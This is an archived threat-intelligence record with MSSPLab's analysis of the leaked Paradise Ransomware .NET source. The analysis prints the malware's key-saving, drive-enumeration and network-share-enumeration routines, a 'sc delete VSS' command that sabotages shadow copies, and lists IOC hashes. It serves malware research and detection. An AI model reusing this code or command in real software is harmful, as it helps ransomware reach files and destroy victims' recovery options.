{
	"id": "e1be6491-3def-408f-86f4-1da8a773c3a9",
	"created_at": "2026-04-06T01:30:37.487007Z",
	"updated_at": "2026-04-10T13:12:28.965079Z",
	"deleted_at": null,
	"sha1_hash": "240a6743e25ebd178655217e419430420069f1f0",
	"title": "Malware source code investigation: Paradise Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2271128,
	"plain_text": "Malware source code investigation: Paradise Ransomware\r\nBy MSSP Research Lab\r\nPublished: 2023-06-23 · Archived: 2026-04-06 00:18:39 UTC\r\nParadise Ransomware is a type of malware that encrypts the files on the victims’ systems and then demands a\r\nransom to recover the data. This ransomware family first appeared in 2017 and continues to be active with\r\nnumerous variants identified over the years. The ransomware typically targets Windows operating systems, and it\r\nis distributed through multiple infection vectors, including malicious email attachments, compromised Remote\r\nDesktop Protocol (RDP), and exploit kits.\r\nOn June 12, 2021, the source code for Paradise Ransomware was exposed on a Russian hacker forum on the dark\r\nweb. After several iterations, the Ransomware became more robust by implementing RSA encryption, which made\r\ndecryption impossible without the private key.\r\nProject evolutionPermalink\r\nParadise versions in 2017-2020:\r\nInitial version of Paradise, which could be decrypted because of an encryption flaw\r\nParadise.NET: a secure.net version that encrypts files with RSA\r\nParadiseB29 is a variant employed by a “team” that encrypts only the file’s conclusion.\r\nThe leaked source code is written on .NET , and when it is given the opportunity to operate in a local and\r\nvirtualized environment, it runs smoothly and without issue on a basic version of the .NET framework in\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 1 of 10\n\nMicrosoft Visual Studio.\r\nThe leaked folder structure is simple:\r\nThe ransom note of the new version is as follows:\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 2 of 10\n\nBuilderPermalink\r\nOver the source code it’s easy to find developer comments in Russian language =^..^=.\r\nMALIKA is the username for the building computer. 
Microsoft Visual Studio permits the user who compiles source code into a binary to embed certain information; the image below displays the username used to compile the project.\r\n\r\nMalika (ملك): Arabic female given name meaning “queen”\r\n\r\nConfiguration:\r\n\r\nAs you can see, the builder is configured by inserting configuration statements directly into the source code. This ransomware has just one main form, MainForm; as a result, DP_Builder’s interface after compilation and execution looks like this:\r\n\r\nThe builder’s fields are: a random RSA encryption vector, generated by clicking Generate; the extension appended to the names of encrypted files (Russian: Расширение); the address of the ransomware’s server, used for data collection; and an administrator key that is extraneous to encryption and is used to identify the builder user.\r\n\r\nSite and Admin key values are stored in Server.info. When re-executed, the builder reads these values from the file and automatically populates the fields.\r\n\r\nThe source code for DP_Builder’s main program, decrypter, and private key generator is contained in the resource file. At build time, random 1024-bit RSA keys are generated and the ransomware’s private key is embedded. This guarantees a particular level of encryption security.\r\n\r\nInteresting trick: if there are no keys on the host, Paradise Ransomware generates and stores them on the local machine. The routine that stores private keys on disk does encrypt them, but there is still work to be done here. The mechanism this version uses to handle keys is the most intriguing aspect for analysis. 
The following image depicts the SavePrivateKey function, which does not do what you expect:\r\n\r\nprivate static void SavePrivateKey()\r\n{\r\n    // Split the private key string into 117-byte blocks (117 bytes is the\r\n    // maximum PKCS#1 v1.5 payload for a 1024-bit RSA key)\r\n    List<byte[]> master = new List<byte[]>();\r\n    byte[] masterbytes = Encoding.Default.GetBytes(RSA_Private);\r\n    int iterations = Convert.ToInt32(Math.Ceiling((double)masterbytes.Length / 117));\r\n    int k = 0;\r\n    for (int i = 0; i < iterations; i++)\r\n    {\r\n        byte[] b = new byte[117];\r\n        for (int j = 0; j < 117; j++)\r\n        {\r\n            if (masterbytes.Length > k)\r\n            {\r\n                b[j] = masterbytes[k];\r\n                k++;\r\n            }\r\n        }\r\n        master.Add(b);\r\n    }\r\n    // Encrypt each block with the master RSA key and append the raw ciphertext\r\n    // bytes decoded as text (decoding arbitrary bytes this way is not lossless)\r\n    string strBytes = \"\";\r\n    foreach (byte[] bts in master)\r\n    {\r\n        byte[] encrypted = MasterRSA.Encrypt(bts, false);\r\n        strBytes += Encoding.Default.GetString(encrypted);\r\n    }\r\n    strBytes = Convert.ToBase64String(Encoding.Default.GetBytes(strBytes));\r\n    CryptedPrivateKey = strBytes;\r\n    strBytes += \"\\n\" + RSA_Public;\r\n    if (KeyValidity())\r\n    {\r\n        SaveKeysToFiles(strBytes);\r\n        LockerForValidKey = false;\r\n    }\r\n}\r\n\r\nSavePrivateKey genuinely saves a combination of the encrypted private key and the public RSA key, as depicted in the preceding code. 
In fact, it then calls another function, SaveKeysToFiles, which saves the keys in a file named DecryptionInfo.auth.\r\n\r\nOf course, the ransomware contains the standard functions for this type of malware, like GetDrives:\r\n\r\nprivate static void GetDrives()\r\n{\r\n    try\r\n    {\r\n        DriveInfo[] allDrives = DriveInfo.GetDrives();\r\n        bool c_contain = false;\r\n        foreach (DriveInfo drive in allDrives)\r\n        {\r\n            // The system drive is queued last so that other volumes are processed first\r\n            if (drive.Name.Contains(\"C:\\\\\")) c_contain = true;\r\n            else\r\n            {\r\n                if (!Drives.Contains(drive.Name))\r\n                {\r\n                    Drives.Enqueue(drive.Name);\r\n                }\r\n            }\r\n        }\r\n        if (c_contain) Drives.Enqueue(\"C:\\\\\");\r\n        return;\r\n    }\r\n    catch (Exception)\r\n    {\r\n        return;\r\n    }\r\n}\r\n\r\nand GetNetwork:\r\n\r\nprivate static void GetNetwork()\r\n{\r\n    List<string> Network = new List<string>();\r\n    // Hosts visible through NET VIEW\r\n    try\r\n    {\r\n        string result = DoCMD(\"NET VIEW\");\r\n        string[] resultList = result.Replace(\"\\r\\n\", \"\\n\").Split('\\n');\r\n        foreach (string line in resultList)\r\n        {\r\n            if (line.Contains(@\"\\\\\"))\r\n            {\r\n                Network.Add(line.Split(' ')[0]);\r\n            }\r\n        }\r\n    }\r\n    catch (Exception) {}\r\n    // Mapped drive letters and UNC paths through NET USE\r\n    try\r\n    {\r\n        string result = DoCMD(\"NET USE\").Replace(\"\\r\\n\", \"\\n\");\r\n        string[] resultList = result.Split('\\n');\r\n        foreach (string line in resultList)\r\n        {\r\n            string drive = new Regex(@\"\\s(\\S{2})\\s\").Match(line).Groups[1].Value;\r\n            if (!Drives.Contains(drive + \"\\\\\") && drive.Contains(\":\")) Drives.Enqueue(drive + \"\\\\\");\r\n            string NetResource = new Regex(@\"(\\\\\\\\[^\\\\\\s]*)\", RegexOptions.IgnoreCase).Match(line).Groups[1].Value;\r\n            if (NetResource != \"\")\r\n            {\r\n                if (!Network.Contains(NetResource)) Network.Add(NetResource);\r\n            }\r\n        }\r\n    }\r\n    catch (Exception) {}\r\n    // Enumerate the Disk shares of each discovered host\r\n    foreach (string device in Network)\r\n    {\r\n        try\r\n        {
            string result = DoCMD(\"NET VIEW \" + device);\r\n            string[] resultList = result.Replace(\"\\r\\n\", \"\\n\").Split('\\n');\r\n            foreach (string line in resultList)\r\n            {\r\n                if (line.Contains(\"Disk\"))\r\n                {\r\n                    string folder = BackspacesCleaner(line);\r\n                    Drives.Enqueue(device + \"\\\\\" + folder);\r\n                }\r\n            }\r\n        }\r\n        catch (Exception) {}\r\n    }\r\n}\r\n\r\nDeleting shadow copies is a fairly common practice for ransomware. Here, too, running the following command through cmd.exe is fairly standard:\r\n\r\nProcessStartInfo psiOpt = new ProcessStartInfo(@\"cmd.exe\", @\"/C sc delete VSS\");\r\n\r\nFinally, the method by which Paradise encrypts files is yet another strange feature. Encrypting “only” the first 10MB of large files is a dubious decision by the malware author. Smaller files are divided into 117-byte chunks, which are iterated over.\r\n\r\nIOCs\r\n\r\nSHA-256 of the analyzed files composing the leaked source code:\r\n363a99b2480c11b9431c046d44b323807e9b11bf237cc291dde11151d8b75581 ./MainForm.cs\r\n753f1e353ad0eb75555f81e090a3e89339d96266f5e33e2ada34c9ea655dcee9 ./AssemblyInfo.cs\r\nbdbf6eb3afe9056e474d2ca2bec98a866c17b8a66405d1463fc9e8b8a832a65c ./obj/Debug/.NETFramework,Version=v4.5.Assembl\r\n6a5c52609d64d0c611b6d0e083f5c8489f8b7e4ff8fbbf4e710b163b1d34d6b3 ./obj/Debug/DP_Builder.csprojAssemblyReference\r\n45ce1722ae08d1ddd4ae590c2ba55dd1a8d61513cb490879ddca1426e8b84983 ./obj/Debug/DesignTimeResolveAssemblyReference\r\nab69b565a381aca056b91dda7eacdb507de078f9f98bf263c5414a5842361e9a ./obj/Debug/DesignTimeResolveAssemblyReference\r\n5eb2c22d092f3bf2077d7e9128c38c1bc29fd0b06479646c05afb0bf741891dc ./MainForm.resx\r\n07958ee0ed74c8e4637d0903d686e66e7bd9e6b89bca0d3df4531d590c848a05 
./Properties/Settings.cs\r\ne9ae7a5837b34b65608964e7315450a3459e0e01366769b68b904504a55db102 ./Properties/Resources.resx\r\na1428e2c84c3420a0481e524e103db7fde84d2107bd02738349c48ee4d6a5353 ./Properties/Resources.cs\r\n0dfb6a940a583432f21ce03634c0e8d6a9030443e391cf44f9581212716d4308 ./DP_Builder.sln\r\nf282d765bb83d76be318a2a982605d06619da2376165ba12cc6ca4e50aa0754d ./Program.cs\r\ne375edc127182453ad7ed84ae3abac3759dded7265284af48015a165e439f26c ./DP_Builder.csproj\r\n\r\nConclusion\r\n\r\nThe leaked source code of the Paradise Ransomware provides invaluable insight into the working mechanisms of this persistent threat. The variant in question is written in .NET, highlighting the shift in language preference by threat actors for its simplicity and extensive library support. Although the threat may now seem diminished, related families still appear today, such as Rapture, a ransomware family with similarities to Paradise.\r\n\r\nBy Cyber Threat Hunters from MSSPLab:\r\n@cocomelonc\r\n@wqkasper\r\n@mgmadr\r\n\r\nReferences\r\nhttps://github.com/TheBadKitten/Paradise-Ransomware\r\nhttps://github.com/vxunderground/MalwareSourceCode/tree/main/Win32/Ransomware\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.paradise\r\nRapture, a Ransomware Family With Similarities to Paradise\r\n\r\nThanks for your time, happy hacking and goodbye!\r\nAll drawings and screenshots are MSSPLab’s\r\nSource: https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html"
	],
	"report_names": [
		"src-paradise.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439037,
	"ts_updated_at": 1775826748,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.pdf",
		"text": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.txt",
		"img": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.jpg"
	}
}